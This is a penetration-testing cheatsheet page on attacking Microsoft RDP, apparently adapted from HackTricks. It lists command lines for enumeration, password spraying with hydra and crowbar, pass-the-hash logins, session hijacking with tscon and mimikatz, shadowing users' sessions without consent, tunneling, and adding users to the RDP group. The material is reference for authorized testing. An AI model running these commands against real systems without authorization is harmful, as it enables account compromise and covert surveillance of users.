daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pentesting-rdp.md (9087B)


      1 ---
      2 title: "3389 - Pentesting RDP"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-rdp.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-rdp.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 3389 - Pentesting RDP
     14 
     15 ## Basic Information
     16 
     17 Microsoft's **Remote Desktop Protocol** (**RDP**) carries graphical display, keyboard, mouse, clipboard, device-redirection, and virtual-channel traffic between a client and a Remote Desktop Session Host. Current Windows deployments should prefer TLS plus Credential Security Support Provider (CredSSP), commonly presented as Network Level Authentication (NLA), instead of the legacy native RDP security layer.<sup>[[3]](#references)</sup>
     18 
     19 **Default port:** 3389
     20 
     21 ```text
     22 PORT     STATE SERVICE
     23 3389/tcp open  ms-wbt-server
     24 ```
     25 
     26 ## Enumeration
     27 
     28 ### Automatic
     29 
     30 ```bash
     31 nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
     32 ```
     33 
     34 These scripts enumerate supported encryption, check the MS12-020 condition without deliberately triggering the denial of service, and obtain Windows information exposed through NTLM.<sup>[[4]](#references)</sup>
     35 
     36 ### Security Layer / NLA Checks
     37 
     38 RDP can negotiate different security layers (native RDP, TLS, or CredSSP/NLA). You can quickly fingerprint the server-side settings and whether NLA is required:
     39 
     40 ```bash
     41 # Security layer and encryption info
     42 nmap --script rdp-enum-encryption -p 3389 <IP>
     43 
     44 # Quick auth check (also reports if NLA is required)
     45 nxc rdp <IP> -u <user> -p <password>
     46 
     47 # Pre-auth screenshot only works if NLA is disabled
     48 nxc rdp <IP> --nla-screenshot
     49 
     50 # Authenticated screenshot after valid login
     51 nxc rdp <IP> -u <user> -p <password> --screenshot
     52 ```
     53 
     54 ### [Brute force](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#rdp)
     55 
     56 **Be careful, you could lock accounts**
     57 
     58 ### **Password Spraying**
     59 
     60 **Be careful, you could lock accounts**
     61 
     62 ```bash
     63 # https://github.com/galkan/crowbar
     64 crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
     65 # hydra
     66 hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
     67 ```
     68 
     69 ### Connect with known credentials/hash
     70 
     71 ```bash
     72 rdesktop -u <username> <IP>
     73 rdesktop -d <domain> -u <username> -p <password> <IP>
     74 xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
     75 xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
     76 ```
     77 
     78 ### Check known credentials against RDP services
     79 
     80 rdp_check.py from impacket let you check if some credentials are valid for a RDP service:
     81 
     82 ```bash
     83 rdp_check <domain>/<name>:<password>@<IP>
     84 ```
     85 
     86 
     87 ## **Attacks**
     88 
     89 ### Session stealing
     90 
     91 With the required **Full Control** or **Connect** permission on an RD Session Host, `tscon` can connect one session to another. A SYSTEM context may possess sufficient local rights in common post-exploitation scenarios, but the documented authorization check still matters.<sup>[[5]](#references)</sup>
     92 
     93 **Get openned sessions:**
     94 
     95 ```text
     96 query user
     97 ```
     98 
     99 **Access to the selected session**
    100 
    101 ```bash
    102 tscon <ID> /dest:<SESSIONNAME>
    103 ```
    104 
    105 The destination session disconnects and is connected to the selected target session. This gives interactive access to that desktop through built-in Windows functionality.
    106 
    107 **Important:** Connecting to an active session can disconnect the user or the current destination session, so expect visible operational impact.<sup>[[5]](#references)</sup>
    108 
    109 You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...)
    110 
    111 #### **Mimikatz**
    112 
    113 You could also use mimikatz to do this:
    114 
    115 ```bash
    116 ts::sessions        #Get sessions
    117 ts::remote /id:2    #Connect to the session
    118 ```
    119 
    120 ### RDP Shadowing (Remote Control)
    121 
    122 If **Remote Desktop Services shadowing** is enabled, you can **view or control** another user's active session (sometimes **without consent**) using built-in `mstsc` switches.<sup>[[1]](#references)</sup>
    123 
    124 ```bash
    125 # List sessions on a remote host
    126 qwinsta /server:<IP>
    127 quser /server:<IP>
    128 
    129 # Shadow a specific session (consent required if policy enforces it)
    130 mstsc /v:<IP> /shadow:<SESSION_ID> /control
    131 
    132 # Shadow without consent if policy allows it
    133 mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt
    134 
    135 # Check current shadowing policy on the target
    136 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow
    137 ```
    138 
    139 ### RDP Virtual Channel Tunneling
    140 
    141 RDP supports **virtual channels** that can be abused for **pivoting/tunneling** over an established RDP session. One option is **rdp2tcp** (client/server) which can multiplex TCP forwards over RDP (works with FreeRDP).<sup>[[2]](#references)</sup>
    142 
    143 ```bash
    144 # Start FreeRDP with rdp2tcp virtual channel
    145 xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp
    146 ```
    147 
    148 [Tunneling And Port Forwarding](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/tunneling-and-port-forwarding.md)
    149 
    150 ### Sticky-keys & Utilman
    151 
    152 Combining session access with an existing **Sticky Keys** or **Utilman** backdoor can expose an administrative command prompt at the sign-in screen. Treat these file-replacement techniques as persistent, detectable system modifications.
    153 
    154 You can search RDPs that have been backdoored with one of these techniques already with: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
    155 
    156 ### RDP Process Injection
    157 
    158 If someone from a different domain or with **better privileges login via RDP** to the PC where **you are an Admin**, you can **inject** your beacon in his **RDP session process** and act as him:
    159 
    160 
    161 [Rdp Sessions Abuse](/hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse)
    162 
    163 ### Adding User to RDP group
    164 
    165 ```bash
    166 net localgroup "Remote Desktop Users" UserLoginName /add
    167 ```
    168 
    169 ## Automatic Tools
    170 
    171 - [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
    172 
    173 **AutoRDPwn** is a PowerShell post-exploitation framework that automates RDP shadowing. Shadowing is an administrative feature, and no-consent control depends on privileges and the Remote Desktop Services policy; abuse of that configuration lets an operator view or control another user's desktop with native tooling.<sup>[[1]](#references)[[6]](#references)</sup>
    174 
    175 - [**EvilRDP**](https://github.com/skelsec/evilrdp)
    176   - Control mouse and keyboard in an automated way from command line
    177   - Control clipboard in an automated way from command line
    178   - Spawn a SOCKS proxy from the client that channels network communication to the target via RDP
    179   - Execute arbitrary SHELL and PowerShell commands on the target without uploading files
    180   - Upload and download files to/from the target even when file transfers are disabled on the target
    181 
    182 - [**SharpRDP**](https://github.com/0xthirteen/SharpRDP)
    183 
    184 This tool allows to execute commands in the victim RDP **without needing a graphical interface**.
    185 
    186 ## HackTricks Automatic Commands
    187 
    188 ```text
    189 Protocol_Name: RDP    #Protocol Abbreviation if there is one.
    190 Port_Number:  3389     #Comma separated if there is more than one.
    191 Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out
    192 
    193 Entry_1:
    194   Name: Notes
    195   Description: Notes for RDP
    196   Note: |
    197     Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
    198 
    199     https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html
    200 
    201 Entry_2:
    202   Name: Nmap
    203   Description: Nmap with RDP Scripts
    204   Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
    205 ```
    206 
    207 
    208 ## References
    209 
    210 - [1] [Remote Desktop Services Shadowing – Beyond the Shadowed Session](https://swarm.ptsecurity.com/remote-desktop-services-shadowing/)
    211 - [2] [V-E-O/rdp2tcp - TCP tunneling over RDP virtual channels](https://github.com/V-E-O/rdp2tcp)
    212 - [3] [Microsoft Learn - Remote Desktop Services overview](https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/overview)
    213 - [4] [Nmap NSE - rdp-enum-encryption](https://nmap.org/nsedoc/scripts/rdp-enum-encryption.html)
    214 - [5] [Microsoft Learn - tscon](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon)
    215 - [6] [Microsoft Learn - Shadow a Terminal Server session](https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/shadow-terminal-server-session)